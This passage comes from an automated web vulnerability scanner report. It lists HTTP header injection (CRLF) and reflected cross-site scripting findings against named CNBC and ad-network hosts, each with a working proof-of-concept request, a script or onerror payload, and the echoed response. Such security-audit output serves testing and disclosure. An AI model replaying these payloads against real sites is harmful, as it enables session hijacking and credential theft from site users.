User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:20 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&d0ea7
3c7455c6879
=1&login_view=header
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:20 GMT; path=/


2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /refreshlogin.jsp

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 42dc1%0d%0ad1b7bab4e94 was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /refreshlogin.jsp?source=42dc1%0d%0ad1b7bab4e94&service=http://www.cnbc.com/ HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:19 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=42dc1%0D%0Ad1b7bab4e94&login_view=42dc1
d1b7bab4e94

Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:19 GMT; path=/


2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /registerUser.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bc1b6%0d%0a38769824fca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /registerUser.do?bc1b6%0d%0a38769824fca=1 HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=8949562430B64F70CC4A99E0D5131B41; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://register.cnbc.com/refreshlogin.jsp?bc1b6
38769824fca
=1
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/


3. Cross-site scripting (reflected)
There are 100 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 1e863<script>alert(1)</script>03af89ea0d9 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=22577671e863<script>alert(1)</script>03af89ea0d9&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:21 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "22577671e863<script>alert(1)</script>03af89ea0d9"

   
                                                           </head>
...[SNIP]...

3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 34bbc--><script>alert(1)</script>f035f2c61ed was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=151549134bbc--><script>alert(1)</script>f035f2c61ed&pid=2257767&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:19 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3548
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "151549134bbc--><script>alert(1)</script>f035f2c61ed" -->
...[SNIP]...

3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 1452a--><script>alert(1)</script>8a3c8bebaae was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=2257767&ps=-11452a--><script>alert(1)</script>8a3c8bebaae&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:24 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3987
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-11452a--><script>alert(1)</script>8a3c8bebaae" -->
   
...[SNIP]...

3.4. http://ads.rnmd.net/getAds [adDiv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.rnmd.net
Path:   /getAds

Issue detail

The value of the adDiv request parameter is copied into the HTML document as plain text between tags. The payload 5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931 was submitted in the adDiv parameter. This input was echoed as 5a098<img src=a onerror=alert(1)>13fd8da2931 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /getAds?delivery=jsonp&adType=banner&adDiv=rnmdad5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931&appId=cnbc_web&t=other,OFFDECK&w=300&h=50&v=1&ck=1315339668282 HTTP/1.1
Host: ads.rnmd.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://m.cnbc.com/mytestc3e92%27-prompt(document.location)-%27f261e685920/ipecho.php

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:53 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache
x-rnmd-pc: 208.91.189.56
Content-Type: application/x-javascript
Content-Length: 709
Set-Cookie: personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:53 GMT
Connection: close

net.rnmd.sdk._private.JsonHelper.completeRequest({"personCookie":"208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8","adDiv":"rnmdad5a098<img src=a onerror=alert(1)>13fd8da2931","htmlPayload":"<div style=\"text-align: center\">
...[SNIP]...

3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-cdn.cnbc.com
Path:   /api/chart/chart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 34781<script>alert(1)</script>ee34ae3f437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/chart/chart.asp?34781<script>alert(1)</script>ee34ae3f437=1 HTTP/1.1
Host: api-cdn.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Content-Type: text/html
Cache-Control: private
Expires: Tue, 06 Sep 2011 16:25:59 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Date: Tue, 06 Sep 2011 17:05:59 GMT
Content-Length: 182
Connection: close

<pre>An Error occurred with this request.

34781<script>alert(1)</script>ee34ae3f437=1</pre>&34781<script>alert(1)</script>ee34ae3f437=1&DCLCore.InternalID=CNAPI">Test link</a><br />

3.6. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c34f5<script>alert(1)</script>a13262bf45d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.dove.us%2FProducts%2FHair%2F&callback=_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,72|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Tue, 06 Sep 2011 16:45:50 GMT
Content-Length: 96
Connection: close

_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d({"shares":19});

3.7. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload e1c14<script>alert(1)</script>d994c816c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:13 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62)

3.8. http://api.bizographics.com/v1/profile.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6718<script>alert(1)</script>2d7bd36d61c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 06 Sep 2011 15:33:16 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 204
Connection: keep-alive

_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5af80<script>alert(1)</script>e6879303a2a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:50 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a)

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload db976<script>alert(1)</script>5d2b699441d was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=db976<script>alert(1)</script>5d2b699441d HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:52 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: db976<script>alert(1)</script>5d2b699441d

3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/chart/chart.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 90215<script>alert(1)</script>736c487a586 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/chart/chart.asp?90215<script>alert(1)</script>736c487a586=1 HTTP/1.1
Host: api.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 17:06:00 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 182
Expires: Tue, 06 Sep 2011 16:26:00 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<pre>An Error occurred with this request.

90215<script>alert(1)</script>736c487a586=1</pre>&90215<script>alert(1)</script>736c487a586=1&DCLCore.InternalID=CNAPI">Test link</a><br />

3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.cnbc.com
Path:   /api/movers/movers.asp

Issue detail

The value of the chartType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f0d"><script>alert(1)</script>2d1497842a9 was submitted in the chartType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers98f0d"><script>alert(1)</script>2d1497842a9&rowCount=3&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
